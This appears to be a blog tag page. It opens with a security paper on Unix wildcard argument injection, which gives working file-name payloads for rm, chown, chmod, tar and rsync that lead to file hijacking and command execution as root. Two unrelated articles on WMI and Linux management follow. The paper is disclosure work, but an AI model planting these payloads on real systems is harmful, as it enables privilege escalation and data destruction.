'unix'에 해당되는 글 8건
Back To The Future: Unix Wildcards Gone Wild============================================ - Leon Juranic <email@example.com> - Creation Date: 04/20/2013 - Release Date: 06/25/2014 Table Of Content: ===[ 1. Introduction ===[ 2. Unix Wildcards For Dummies ===[ 3. Wildcard Wilderness ===[ 4. Something more useful... 4.1 Chown file reference trick (file owner hijacking) 4.2 Chmod file reference trick 4.3 Tar arbitrary command execution 4.4 Rsync arbitrary command execution ===[ 5. Conclusion ===[ 1. Introduction First of all, this article has nothing to do with modern hacking techniques like ASLR bypass, ROP exploits, 0day remote kernel exploits or Chrome's Chain-14-Different-Bugs-To-Get-There... Nope, nothing of the above. This article will cover one interesting old-school Unix hacking technique, that will still work nowadays in 2013. Hacking technique of which (to my suprise) even many security-related people haven't heard of. That is probably because nobody ever really talked about it before. Why I decided to write on this subject is because, to me personally, it's pretty funny to see what can be done with simple Unix wildcard poisoning tricks. So, from this article, what you can expect is collection of neat *nix hacking tricks that as far as I know somehow didn't emerge earlier. If you wonder how basic Unix tools like 'tar' or 'chown' can lead to full system compromise, keep on reading. Ladies and gentleman; take your seats, fasten your belts and hold on tight - cause we're going straight back to the 80's, right to the Unix shell hacking... (Is this bad-hair-rock/groovy disco music playing in the background? I think sooo...) ===[ 2. Unix Wildcards For Dummies If you already know what Unix wildcards are, and how (and why) are they used in shell scripting, you should skip this part. However, we will include Wildcard definition here just for the sake of consistency and for potential newcomers. Wildcard is a character, or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by shell before any other action is taken. Some Shell Wildcards: * An asterisk matches any number of characters in a filename, including none. ? The question mark matches any single character. [ ] Brackets enclose a set of characters, any one of which may match a single character at that position. - A hyphen used within [ ] denotes a range of characters. ~ A tilde at the beginning of a word expands to the name of your home directory. If you append another user's login name to the character, it refers to that user's home directory. Basic example of wildcards usage: # ls *.php - List all files with PHP extension # rm *.gz - Delete all GZIP files # cat backup* - Show content of all files which name is beginning with 'backup' string # ls test? - List all files whose name is beginning with string 'test' and has exactly one additional character ===[ 3. Wildcard Wilderness Wildcards as their name states, are "wild" by their nature, but moreover, in some cases, wildcards can go berserk. During the initial phase of playing with this interesting wildcard tricks, I've talked with dozen old-school Unix admins and security people, just to find out how many of them knows about wildcard tricks, and potential danger that they pose. To my suprise, only two of 20 people stated that they know it's not wise to use wildcard, particulary in 'rm' command, because someone could abuse it with "argument-like-filename". One of them said that he heard of that years ago on some basic Linux admin course. Funny. Simple trick behind this technique is that when using shell wildcards, especially asterisk (*), Unix shell will interpret files beginning with hyphen (-) character as command line arguments to executed command/program. That leaves space for variation of classic channeling attack. Channeling problem will arise when different kind of information channels are combined into single channel. Practical case in form of particulary this technique is combining arguments and filenames, as different "channels" into single, because of using shell wildcards. Let's check one very basic wildcard argument injection example. [root@defensecode public]# ls -al total 20 drwxrwxr-x. 5 leon leon 4096 Oct 28 17:04 . drwx------. 22 leon leon 4096 Oct 28 16:15 .. drwxrwxr-x. 2 leon leon 4096 Oct 28 17:04 DIR1 drwxrwxr-x. 2 leon leon 4096 Oct 28 17:04 DIR2 drwxrwxr-x. 2 leon leon 4096 Oct 28 17:04 DIR3 -rw-rw-r--. 1 leon leon 0 Oct 28 17:03 file1.txt -rw-rw-r--. 1 leon leon 0 Oct 28 17:03 file2.txt -rw-rw-r--. 1 leon leon 0 Oct 28 17:03 file3.txt -rw-rw-r--. 1 nobody nobody 0 Oct 28 16:38 -rf We have directory with few subdirectories and few files in it. There is also file with '-rf' filename ther owned by the user 'nobody'. Now, let's run 'rm *' command, and check directory content again. [root@defensecode public]# rm * [root@defensecode public]# ls -al total 8 drwxrwxr-x. 2 leon leon 4096 Oct 28 17:05 . drwx------. 22 leon leon 4096 Oct 28 16:15 .. -rw-rw-r--. 1 nobody nobody 0 Oct 28 16:38 -rf Directory is totally empty, except for '-rf' file in it. All files and directories were recursively deleted, and it's pretty obvious what happened... When we started 'rm' command with asterisk argument, all filenames in current directory were passed as arguments to 'rm' on command line, exactly same as following line: [user@defensecode WILD]$ rm DIR1 DIR2 DIR3 file1.txt file2.txt file3.txt -rf Since there is '-rf' filename in current directory, 'rm' got -rf option as the last argument, and all files in current directory were recursively deleted. We can also check that with strace: [leon@defensecode WILD]$ strace rm * execve("/bin/rm", ["rm", "DIR1", "DIR2", "DIR3", "file1.txt", "file2.txt", "file3.txt", "-rf"], [/* 25 vars */]) = 0 ^- HERE Now we know how it's possible to inject arbitrary arguments to the unix shell programs. In the following chapter we will discuss how we can abuse that feature to do much more than just recursively delete files. ===[ 4. Something more useful... Since now we know how it's possible to inject arbitrary arguments to shell commands, let's demonstrate few examples that are more useful, than just recursive file unlinking. First, when I stumbled across this wildcard tricks, I was starting to look for basic and common Unix programs that could be seriously affected with arbitrary and unexpected arguments. In real-world cases, following examples could be abused in form of direct interactive shell poisoning, or through some commands started from cron job, shell scripts, through some web application, and so on. In all examples below, attacker is hidden behind 'leon' account, and victim is of course - root account. ==[ 4.1 Chown file reference trick (file owner hijacking) First really interesting target I've stumbled across is 'chown'. Let's say that we have some publicly writeable directory with bunch of PHP files in there, and root user wants to change owner of all PHP files to 'nobody'. Pay attention to the file owners in the following files list. [root@defensecode public]# ls -al total 52 drwxrwxrwx. 2 user user 4096 Oct 28 17:47 . drwx------. 22 user user 4096 Oct 28 17:34 .. -rw-rw-r--. 1 user user 66 Oct 28 17:36 admin.php -rw-rw-r--. 1 user user 34 Oct 28 17:35 ado.php -rw-rw-r--. 1 user user 80 Oct 28 17:44 config.php -rw-rw-r--. 1 user user 187 Oct 28 17:44 db.php -rw-rw-r--. 1 user user 201 Oct 28 17:35 download.php -rw-r--r--. 1 leon leon 0 Oct 28 17:40 .drf.php -rw-rw-r--. 1 user user 43 Oct 28 17:35 file1.php -rw-rw-r--. 1 user user 56 Oct 28 17:47 footer.php -rw-rw-r--. 1 user user 357 Oct 28 17:36 global.php -rw-rw-r--. 1 user user 225 Oct 28 17:35 header.php -rw-rw-r--. 1 user user 117 Oct 28 17:35 inc.php -rw-rw-r--. 1 user user 111 Oct 28 17:38 index.php -rw-rw-r--. 1 leon leon 0 Oct 28 17:45 --reference=.drf.php -rw-rw----. 1 user user 66 Oct 28 17:35 password.inc.php -rw-rw-r--. 1 user user 94 Oct 28 17:35 script.php Files in this public directory are mostly owned by the user named 'user', and root user will now change that to 'nobody'. [root@defensecode public]# chown -R nobody:nobody *.php Let's see who owns files now... [root@defensecode public]# ls -al total 52 drwxrwxrwx. 2 user user 4096 Oct 28 17:47 . drwx------. 22 user user 4096 Oct 28 17:34 .. -rw-rw-r--. 1 leon leon 66 Oct 28 17:36 admin.php -rw-rw-r--. 1 leon leon 34 Oct 28 17:35 ado.php -rw-rw-r--. 1 leon leon 80 Oct 28 17:44 config.php -rw-rw-r--. 1 leon leon 187 Oct 28 17:44 db.php -rw-rw-r--. 1 leon leon 201 Oct 28 17:35 download.php -rw-r--r--. 1 leon leon 0 Oct 28 17:40 .drf.php -rw-rw-r--. 1 leon leon 43 Oct 28 17:35 file1.php -rw-rw-r--. 1 leon leon 56 Oct 28 17:47 footer.php -rw-rw-r--. 1 leon leon 357 Oct 28 17:36 global.php -rw-rw-r--. 1 leon leon 225 Oct 28 17:35 header.php -rw-rw-r--. 1 leon leon 117 Oct 28 17:35 inc.php -rw-rw-r--. 1 leon leon 111 Oct 28 17:38 index.php -rw-rw-r--. 1 leon leon 0 Oct 28 17:45 --reference=.drf.php -rw-rw----. 1 leon leon 66 Oct 28 17:35 password.inc.php -rw-rw-r--. 1 leon leon 94 Oct 28 17:35 script.php Something is not right... What happened? Somebody got drunk here. Superuser tried to change files owner to the user:group 'nobody', but somehow, all files are owned by the user 'leon' now. If we take closer look, this directory previously contained just the following two files created and owned by the user 'leon'. -rw-r--r--. 1 leon leon 0 Oct 28 17:40 .drf.php -rw-rw-r--. 1 leon leon 0 Oct 28 17:45 --reference=.drf.php Thing is that wildcard character used in 'chown' command line took arbitrary '--reference=.drf.php' file and passed it to the chown command at the command line as an option. Let's check chown manual page (man chown): --reference=RFILE use RFILE's owner and group rather than specifying OWNER:GROUP values So in this case, '--reference' option to 'chown' will override 'nobody:nobody' specified as the root, and new owner of files in this directory will be exactly same as the owner of '.drf.php', which is in this case user 'leon'. Just for the record, '.drf' is short for Dummy Reference File. :) To conclude, reference option can be abused to change ownership of files to some arbitrary user. If we set some other file as argument to the --reference option, file that's owned by some other user, not 'leon', in that case he would become owner of all files in this directory. With this simple chown parameter pollution, we can trick root into changing ownership of files to arbitrary users, and practically "hijack" files that are of interest to us. Even more, if user 'leon' previously created a symbolic link in that directory that points to let's say /etc/shadow, ownership of /etc/shadow would also be changed to the user 'leon'. ===[ 4.2 Chmod file reference trick Another interesting attack vector similar to previously described 'chown' attack is 'chmod'. Chmod also has --reference option that can be abused to specify arbitrary permissions on files selected with asterisk wildcard. Chmod manual page (man chmod): --reference=RFILE use RFILE's mode instead of MODE values Example is presented below. [root@defensecode public]# ls -al total 68 drwxrwxrwx. 2 user user 4096 Oct 29 00:41 . drwx------. 24 user user 4096 Oct 28 18:32 .. -rw-rw-r--. 1 user user 20480 Oct 28 19:13 admin.php -rw-rw-r--. 1 user user 34 Oct 28 17:47 ado.php -rw-rw-r--. 1 user user 187 Oct 28 17:44 db.php -rw-rw-r--. 1 user user 201 Oct 28 17:43 download.php -rwxrwxrwx. 1 leon leon 0 Oct 29 00:40 .drf.php -rw-rw-r--. 1 user user 43 Oct 28 17:35 file1.php -rw-rw-r--. 1 user user 56 Oct 28 17:47 footer.php -rw-rw-r--. 1 user user 357 Oct 28 17:36 global.php -rw-rw-r--. 1 user user 225 Oct 28 17:37 header.php -rw-rw-r--. 1 user user 117 Oct 28 17:36 inc.php -rw-rw-r--. 1 user user 111 Oct 28 17:38 index.php -rw-r--r--. 1 leon leon 0 Oct 29 00:41 --reference=.drf.php -rw-rw-r--. 1 user user 94 Oct 28 17:38 script.php Superuser will now try to set mode 000 on all files. [root@defensecode public]# chmod 000 * Let's check permissions on files... [root@defensecode public]# ls -al total 68 drwxrwxrwx. 2 user user 4096 Oct 29 00:41 . drwx------. 24 user user 4096 Oct 28 18:32 .. -rwxrwxrwx. 1 user user 20480 Oct 28 19:13 admin.php -rwxrwxrwx. 1 user user 34 Oct 28 17:47 ado.php -rwxrwxrwx. 1 user user 187 Oct 28 17:44 db.php -rwxrwxrwx. 1 user user 201 Oct 28 17:43 download.php -rwxrwxrwx. 1 leon leon 0 Oct 29 00:40 .drf.php -rwxrwxrwx. 1 user user 43 Oct 28 17:35 file1.php -rwxrwxrwx. 1 user user 56 Oct 28 17:47 footer.php -rwxrwxrwx. 1 user user 357 Oct 28 17:36 global.php -rwxrwxrwx. 1 user user 225 Oct 28 17:37 header.php -rwxrwxrwx. 1 user user 117 Oct 28 17:36 inc.php -rwxrwxrwx. 1 user user 111 Oct 28 17:38 index.php -rw-r--r--. 1 leon leon 0 Oct 29 00:41 --reference=.drf.php -rwxrwxrwx. 1 user user 94 Oct 28 17:38 script.php What happened? Instead of 000, all files are now set to mode 777 because of the '--reference' option supplied through file name.. Once again, file .drf.php owned by user 'leon' with mode 777 was used as reference file and since --reference option is supplied, all files will be set to mode 777. Beside just --reference option, attacker can also create another file with '-R' filename, to change file permissions on files in all subdirectories recursively. ===[ 4.3 Tar arbitrary command execution Previous example is nice example of file ownership hijacking. Now, let's go to even more interesting stuff like arbitrary command execution. Tar is very common unix program for creating and extracting archives. Common usage for lets say creating archives is: [root@defensecode public]# tar cvvf archive.tar * So, what's the problem with 'tar'? Thing is that tar has many options, and among them, there some pretty interesting options from arbitrary parameter injection point of view. Let's check tar manual page (man tar): --checkpoint[=NUMBER] display progress messages every NUMBERth record (default 10) --checkpoint-action=ACTION execute ACTION on each checkpoint There is '--checkpoint-action' option, that will specify program which will be executed when checkpoint is reached. Basically, that allows us arbitrary command execution. Check the following directory: [root@defensecode public]# ls -al total 72 drwxrwxrwx. 2 user user 4096 Oct 28 19:34 . drwx------. 24 user user 4096 Oct 28 18:32 .. -rw-rw-r--. 1 user user 20480 Oct 28 19:13 admin.php -rw-rw-r--. 1 user user 34 Oct 28 17:47 ado.php -rw-r--r--. 1 leon leon 0 Oct 28 19:19 --checkpoint=1 -rw-r--r--. 1 leon leon 0 Oct 28 19:17 --checkpoint-action=exec=sh shell.sh -rw-rw-r--. 1 user user 187 Oct 28 17:44 db.php -rw-rw-r--. 1 user user 201 Oct 28 17:43 download.php -rw-rw-r--. 1 user user 43 Oct 28 17:35 file1.php -rw-rw-r--. 1 user user 56 Oct 28 17:47 footer.php -rw-rw-r--. 1 user user 357 Oct 28 17:36 global.php -rw-rw-r--. 1 user user 225 Oct 28 17:37 header.php -rw-rw-r--. 1 user user 117 Oct 28 17:36 inc.php -rw-rw-r--. 1 user user 111 Oct 28 17:38 index.php -rw-rw-r--. 1 user user 94 Oct 28 17:38 script.php -rwxr-xr-x. 1 leon leon 12 Oct 28 19:17 shell.sh Now, for example, root user wants to create archive of all files in current directory. [root@defensecode public]# tar cf archive.tar * uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Boom! What happened? /usr/bin/id command gets executed! We've just achieved arbitrary command execution under root privileges. Once again, there are few files created by user 'leon'. -rw-r--r--. 1 leon leon 0 Oct 28 19:19 --checkpoint=1 -rw-r--r--. 1 leon leon 0 Oct 28 19:17 --checkpoint-action=exec=sh shell.sh -rwxr-xr-x. 1 leon leon 12 Oct 28 19:17 shell.sh Options '--checkpoint=1' and '--checkpoint-action=exec=sh shell.sh' are passed to the 'tar' program as command line options. Basically, they command tar to execute shell.sh shell script upon the execution. [root@defensecode public]# cat shell.sh /usr/bin/id So, with this tar argument pollution, we can basically execute arbitrary commands with privileges of the user that runs tar. As demonstrated on the 'root' account above. ===[ 4.4 Rsync arbitrary command execution Rsync is "a fast, versatile, remote (and local) file-copying tool", that is very common on Unix systems. If we check 'rsync' manual page, we can again find options that can be abused for arbitrary command execution. Rsync manual: "You use rsync in the same way you use rcp. You must specify a source and a destination, one of which may be remote." Interesting rsync option from manual: -e, --rsh=COMMAND specify the remote shell to use --rsync-path=PROGRAM specify the rsync to run on remote machine Let's abuse one example directly from the 'rsync' manual page. Following example will copy all C files in local directory to a remote host 'foo' in '/src' directory. # rsync -t *.c foo:src/ Directory content: [root@defensecode public]# ls -al total 72 drwxrwxrwx. 2 user user 4096 Mar 28 04:47 . drwx------. 24 user user 4096 Oct 28 18:32 .. -rwxr-xr-x. 1 user user 20480 Oct 28 19:13 admin.php -rwxr-xr-x. 1 user user 34 Oct 28 17:47 ado.php -rwxr-xr-x. 1 user user 187 Oct 28 17:44 db.php -rwxr-xr-x. 1 user user 201 Oct 28 17:43 download.php -rw-r--r--. 1 leon leon 0 Mar 28 04:45 -e sh shell.c -rwxr-xr-x. 1 user user 43 Oct 28 17:35 file1.php -rwxr-xr-x. 1 user user 56 Oct 28 17:47 footer.php -rwxr-xr-x. 1 user user 357 Oct 28 17:36 global.php -rwxr-xr-x. 1 user user 225 Oct 28 17:37 header.php -rwxr-xr-x. 1 user user 117 Oct 28 17:36 inc.php -rwxr-xr-x. 1 user user 111 Oct 28 17:38 index.php -rwxr-xr-x. 1 user user 94 Oct 28 17:38 script.php -rwxr-xr-x. 1 leon leon 31 Mar 28 04:45 shell.c Now root will try to copy all C files to the remote server. [root@defensecode public]# rsync -t *.c foo:src/ rsync: connection unexpectedly closed (0 bytes received so far) [sender] rsync error: error in rsync protocol data stream (code 12) at io.c(601) [sender=3.0.8] Let's see what happened... [root@defensecode public]# ls -al total 76 drwxrwxrwx. 2 user user 4096 Mar 28 04:49 . drwx------. 24 user user 4096 Oct 28 18:32 .. -rwxr-xr-x. 1 user user 20480 Oct 28 19:13 admin.php -rwxr-xr-x. 1 user user 34 Oct 28 17:47 ado.php -rwxr-xr-x. 1 user user 187 Oct 28 17:44 db.php -rwxr-xr-x. 1 user user 201 Oct 28 17:43 download.php -rw-r--r--. 1 leon leon 0 Mar 28 04:45 -e sh shell.c -rwxr-xr-x. 1 user user 43 Oct 28 17:35 file1.php -rwxr-xr-x. 1 user user 56 Oct 28 17:47 footer.php -rwxr-xr-x. 1 user user 357 Oct 28 17:36 global.php -rwxr-xr-x. 1 user user 225 Oct 28 17:37 header.php -rwxr-xr-x. 1 user user 117 Oct 28 17:36 inc.php -rwxr-xr-x. 1 user user 111 Oct 28 17:38 index.php -rwxr-xr-x. 1 user user 94 Oct 28 17:38 script.php -rwxr-xr-x. 1 leon leon 31 Mar 28 04:45 shell.c -rw-r--r--. 1 root root 101 Mar 28 04:49 shell_output.txt There were two files owned by user 'leon', as listed below. -rw-r--r--. 1 leon leon 0 Mar 28 04:45 -e sh shell.c -rwxr-xr-x. 1 leon leon 31 Mar 28 04:45 shell.c After 'rsync' execution, new file shell_output.txt whose owner is root is created in same directory. -rw-r--r--. 1 root root 101 Mar 28 04:49 shell_output.txt If we check its content, following data is found. [root@defensecode public]# cat shell_output.txt uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Trick is that because of the '*.c' wildcard, 'rsync' got '-e sh shell.c' option on command line, and shell.c will be executed upon 'rsync' start. Content of shell.c is presented below. [root@defensecode public]# cat shell.c /usr/bin/id > shell_output.txt ===[ 5. Conclusion Techniques discussed in article can be applied in different forms on various popular Unix tools. In real-world attacks, arbitrary shell options/arguments could be hidden among regular files, and not so easily spotted by administrator. Moreover, in case of cron jobs, shell scripts or web applications that calls shell commands, that's not even important. Moreover, there are probably much more popular Unix tools susceptible to previously described wildcard attacks. Thanks to Hrvoje Spoljar and Sec-Consult for a few ideas regarding this document.
출처 : exploit-db.com
For many people, the idea of using Linux as a low-cost network management platform can be highly seductive. As the argument goes, even the most rudimentary Linux distributions include the components that are needed to build a modest management console, with Net-SNMP extracting management information from devices on the network, RRDtool storing and graphing the collected data, and one of the many Linux-based network management packages providing a Web-based point-and-click interface to the system as a whole.
For the most part, this approach can even work fairly well for basic monitoring tasks, although it also has its limits. In particular, most network devices do not publish all of their available management data through SNMP, and getting to the additional data typically requires the use of an alternative management interface.
This can even be a challenge with Linux itself, since many of the system variables in the /proc filesystem are not published over SNMP by default, while many of the web and email application servers that are commonly used with Linux do not have any SNMP interfaces at all. If you need to capture any of that data, you'll need to find a way to extract it from log files or process-management tools, and then import it into your management station through a secondary interface.
But while this can be tedious for systems like Linux, it's a huge problem for the systems and services that use Windows Management Instrumentation (WMI) as their primary management subsystem, since there has not historically been any way to query WMI from Linux directly (see sidebar at right). Instead, administrators who have committed themselves to Linux-based management consoles have had to rely on gateway or proxy technologies that query Windows systems for the desired data on behalf of the management station. For Windows-heavy networks, the path of least resistance has simply been to use Windows-based management platforms that can access the data directly, and forgo the Linux management station altogether.
In practice, there are a variety of ways to pull WMI data into Linux-based management tools, many of which are discussed throughout the remainder of this article. However, while most of these tools are useful for extracting some degree of data from WMI, they also have unique operating considerations which can affect their utility in unexpected ways. For example, some of the solutions require new software to be installed at the management station, on a gateway device, or at each of the Windows hosts that will be monitored, and some of them may require modifications to the security permissions on some of those systems as well. Similarly, the different solutions can expose widely varying amounts of data, which not only determines the functionality of a particular package, but also introduces additional security considerations.
The Windows SNMP Agent
The simplest way to get data from WMI into Linux management stations is to go through the SNMP agent that is included with the Windows operating system, although there are some significant limits on the information that is available through this interface. More accurately, the principle restriction with the Windows SNMP agent is that it does not provide much in the way of Windows-specific data.
For example, the HOST-RESOURCE-MIB defines basic CPU utilization metrics that shows the average processor utilization levels for the last minute of activity, but that is all it provides. The problem here is that the standardized data just isn't very useful, especially compared to the CPU utilization data from the WMI performance counters which tells us how many tasks are currently in the process queue, how much of the load is from system tasks versus user tasks, and much more. Unfortunately, none of the interesting and useful data is available through the native SNMP agent.
The good news is that some third parties have stepped up to fill this void, and it's possible to get at the interesting data via SNMP by using aftermarket extensions. The biggest name in this space is SNMP Informant, which is the brand name for a series of products ranging from a basic freeware extension that exposes a limited amount of operating system data all the way up to a commercial multi-extension that exposes huge tracts of data from the operating system and add-on packages like Microsoft Exchange and SQL Server (among others).
SNMP Informant works by strongly data-typing the core performance counter objects, and then mapping predefined OIDs against those objects, thereby allowing administrators to make explicit and clean references to system-level objects in a consistent and reliable way. However, the downside to this approach is that every OID in the extension must be predefined, and SNMP Informant only focuses on several very important areas but does not attempt to expose the entire WMI subsystem to SNMP. This means that if you need to access performance counters or some other piece of WMI data that SNMP Informant does not already publish, you have to look elsewhere.
One interesting extension that has appeared in this space recently is the freeware SnmpTools, which purports to allow mapping administrator-defined OIDs to a variety of data sources, including hard-coded string values, dynamic performance counter objects in WMI, and even dynamic output from text-based scripts and programs. Although the WMI-specific part of the extension is limited to performance counter objects, it's theoretically possible to query other parts of the subsystem through the use of a local script and return the data through the command interface.
Another angle on this space is that many of the server hardware vendors provide their own SNMP extensions for Windows as a way to publish management information about the server hardware. When added to the other extensions discussed above, this can really round out the data that is available through the stock SNMP agent.
The general downside to this class of tools is that they have to be installed on every Windows system, since they extend the SNMP agent on the local host. However, they do not require any new software on the Linux management station, since they tend to work seamlessly with existing SNMP interfaces. These technologies also do not typically require any significant changes to existing security models, since the native SNMP agent's authentication services will continue to be used. On the other hand, the lack of encryption in SNMP means that adding extensions that publish more data will result in more data being available for eavesdroppers to discover.
WBEM and WMI
Just as SNMP is generally the preferred management technology for Linux systems to use when querying Windows devices, the other end of the spectrum has it that WMI is the most natural technology to use when managing Windows systems and services. Thus, if Windows cannot be made to speak SNMP adequately, another option is to make Linux speak WMI. But as stated in the introduction, WMI has not historically been available to Linux systems due to a variety of technological issues. However, it has long been possible to make Linux systems speak WBEM, and since the principle difference between WBEM and WMI is the transfer protocol in use (again, see sidebar), all that's really needed to expose WMI to Linux is a WBEM listener for Windows and a WBEM client for Linux.
There are a couple of options for running a WBEM listener on Windows. For one, the Open Group has an open-source WBEM implementation called OpenPegasus with a standalone WBEM-to-WMI gateway component called WMI Mapper, which listens for incoming HTTP/WBEM queries on the standardized ports, processes the requests as WMI queries on the destination system, and then returns the answer data to the original requester. Unfortunately, WMI Mapper is only available from the OpenPegasus web site as raw source code, which can be an issue for many organizations. However, the HP Systems Insight Manager server-management toolkit provides a prebuilt version of WMI Mapper as a separate downloadable add-on package.
Another option for adding WBEM capabilities to Windows comes from the IBM Systems Director server-management suite. Specifically, IBM Systems Director provides Windows agents with comprehensive WBEM implementation that can also be used to query WMI on the local system. These agents can carry a lot of overhead, but they can also add a tremendous amount of manageability to their host systems. Furthermore, organizations who are thinking about using WBEM on their other platforms can look at the Director agents as a way to get a consistent WBEM interface on multiple platforms simultaneously.
Once one of these packages have been installed and configured, the only remaining requirement is a WBEM client for Linux that can generate queries and return formatted data to the management console. There are a handful of WBEM toolkits available for Linux (including tools that are included in the aforementioned WBEM-based server-management consoles), but one simple utility for this purpose is wbemcli from the Standards-Based Linux Instrumentation (SBLIM) suite, which allows you to generate requests for named resources and apply basic formatting to the response data using command line options. Some of the common Linux distributions already include the sblim-wbemcli package, but it can also be downloaded from sourceforge.
There is also the somewhat-recent option of running a WMI client directly on Linux, and bypassing all of the intermediate technologies altogether. Specifically, the Linux-based Zenoss management platform provides a utility called wmic, which uses the Samba4 libraries to access Windows and interact with WMI directly. Using the wmic utility, it's possible to retrieve just about any object from anywhere in WMI (the author uses it togenerate custom graphs from Everest sensor readings stored in WMI), although you have to generate the queries using the WQL (WMI Query Language, which is very similar to SQL). wmic is packaged as a separate program in some Linux distributions, but is also included in the open-source version of Zenoss Core.
Of all the options for getting management data out of WMI, wmic is clearly the simplest and cleanest way to do it. However, it's also important to recognize that wmic is only useful for querying WMI, and it is unable to engage or manipulate WMI objects. If you need that level of access then one of the WBEM approaches is going to be your only option for now. Another advantage that WBEM has over wmic is the fact that you can deploy WBEM servers on your Linux systems so that all of your devices are presenting fairly consistent high-level management interfaces. This is not something that should be embraced casually, but it is an important and compelling opportunity that should not be dismissed blithely either.
In terms of deployment, the Director Agent is the only technology mentioned that requires new software to be installed on the Windows systems for the data to be accessible to Linux management consoles. The OpenPegasus/HP WMI Mapper gateway is able to issue WMI requests for objects on local and remote Windows systems, so it only needs to be installed on a single gateway device. wmicdoes not need any new software on any Windows device. All of these solutions require client-side software of some kind on the Linux management console.
All of these solutions also require changes to Windows' security permissions in order to function, particularly in the areas of WMI object permissions, and in the case of wmic there are likely to be changes to DCOM permissions as well (the default Windows permissions only allow administrative users to issue remote queries, which is not viable for most networks).
Remote Command Execution
If SNMP and WBEM/WMI all prove to be unsatisfactory for some reason, then it's time to explore alternative management interfaces. Luckily, this tends to be fairly straightforward on Linux-based management systems; everything uses the command-line to move data around already, so calling an alternative management tool is theoretically as simple as replacing the snmpget command with an appropriate substitute, and ensuring that properly-formatted response strings are generated.
As was alluded to in the introduction, this kind of alternative command model is sometimes needed in order to pull interesting data from the local Linux system itself. For example, if you need to routinely extract management data from a local email server's log file, then you will probably need to execute an arbitrary script that returns the required data and then pass the formatted results back to the management station. By extension, if you need to gather this data from all of the Linux hosts on your network, then one option worth considering is to simply distribute the script to each of them, and then use a local program to execute the remote scripts as needed. This same model can also be made to work with Windows, and in fact is actively embraced by some popular management toolkits.
However, this model can also be slow, resource-intensive, and even risky, depending on how it is implemented. Simply put, it's expensive to spawn command processes, and twice as expensive to spawn them locally and remotely. It would be foolish to use this model when some other lighter option was available. On the other hand, if you need to perform a computationally- or I/O-intensive process in order to obtain the desired information (such as parsing through open log files, or gathering multiple pieces of data for comparison purposes) then it can often be faster and cheaper to execute the command on the remote host instead of issuing multiple discrete queries across the network and performing the calculations locally.
As for making this work, modern versions of Windows usually include most of the tools that are needed, although some assembly is often required, with greater amounts of work being needed for progressively older versions of the operating system. For example, modern versions of Windows include the Windows Script Host interpreter and the character-based cscript.exe front-end, which cumulatively allow you to execute VBScript files from the command line. Even more recently, the Windows PowerShell also provides a scriptable environment that is accessible directly. Either of these tools can be used to query and even manipulate WMI objects, including WMI objects on other Windows hosts across a network.
There are also multiple options available for executing these scripts from remote. One option here is to install an SSH server on the Windows host, and then use
ssh hostname remote-command from the Linux console to execute the desired script, just like you would on UNIX systems. Windows systems with Subsystem for UNIX Applications (SUA)/Services for UNIX (SFU) can download premade SSH servers from Interop Systems. Alternatively, there are multiple SSH servers for Windows available that are based on Cygwin if you prefer to use that environment.
As another option, the Nagios management platform provides a remote-command interface called NRPE that is essentially a client-server protocol for executing predefined commands. In this model, target systems are setup as NRPE servers, while the management station runs an NRPE client. Commands are defined in a configuration file at each server, and the client connects to the server and instructs it to execute one of those commands, with any additional parameters being supplied in the request. If the command is known to the server, it executes the request and returns the response data, then closes the connection. NRPE is simpler to setup than SSH, and it is also arguably more secure given that the server cannot run arbitrary programs. There is also a prebuilt NRPE server for Windows available.
Naturally, the ramifications for this class of technology can be immense. On the security front, their whole raison d'être is to facilitate remote command-level access to your Windows servers, which frankly should be enough to give anyone pause. As for deployment, these tools require additional software or scripts on the Windows hosts, but since the scripting tools can perform WMI queries over the network you really only need the executables to be installed on one specific server, which can then act as a proxy for all of the other Windows hosts that it has access to (this will require that the scripts have a hostname argument, obviously). Some software may also be required on the Linux management station, such as the NRPE client, or wrapper scripts that call the preferred tool and dispose of the response data.
Administrators who are interested in pursuing remote-command execution techniques should study some of the scripts hosted on monitoringexchange.org, which includes a variety of VBScript files for extracting data from WMI. Some of these scripts can be useful for some of the other technologies mentioned earlier as well.
At the time of writing, Configuration Manager 2012 Service Pack 1 offers client support for the following UNIX and Linux distributions;
- Red Hat Enterprise Linux
- Version 4, 5, 6 (x86 and x64)
- Version 9 (SPARC)
- Version 10 (x86 and SPARC)
- SUSE Linux Enterprise Server
- Version 9 (x86)
- Version 10 SP1 (x86 and x64)
- Version 11 (x86 and x64)
In the near future the number of distributions supported will increase, putting Configuration Manager’s UNIX and Linux support in line with System Center Operations Manager. It is also worth pointing out that the support for UNIX and Linux distributions is targeted to the server distributions rather than the client distributions.
The UNIX/Linux client is fairly lightweight in comparison to its Windows (or even Mac) counter parts, with the following natively supported features;
- Hardware inventory
- Inventory of installed software
- Software distribution
No Configuration Manager 2012 infrastructure changes are required to support UNIX/Linux clients, and additionally, as Configuration Manager 2012 sees the UNIX/Linux clients as just another client, the reports you are using today for your Windows based clients are the same that you use for the UNIX/Linux clients.
Each UNIX/Linux distribution has its own set of client installation files which can be downloaded from our download centre, as UNIX/Linux versions can have different characteristics that we need to interact with (note the orange layer in the diagram below).
You’ll also note that we are installing a CIM server called NanoWbem (Opensourced by Microsoft through Opengroup http://www.opengroup.org/software/omi) along with the client itself to provide the WMI-like functionality we are used to with a Windows client. One thing to be aware of is that the CIM server we are installing with the Configuration Manager 2012 SP1 client is different to the CIM server that the System Center Operations Manager client installs.
The UNIX/Linux client talks back to the Configuration Manager 2012 SP1 infrastructure over HTTP or HTTPS. Content downloads are also performed over the same protocol (so there is no SMB client requirement on your UNIX/Linux server), but as the UNIX/Linux clients are treated as workgroup clients you need to ensure the network access account is configured. The UNIX/Linux client will then use the network access account to authenticate with the distribution point when downloading content.
Why do I care as a ConfigMgr administrator?
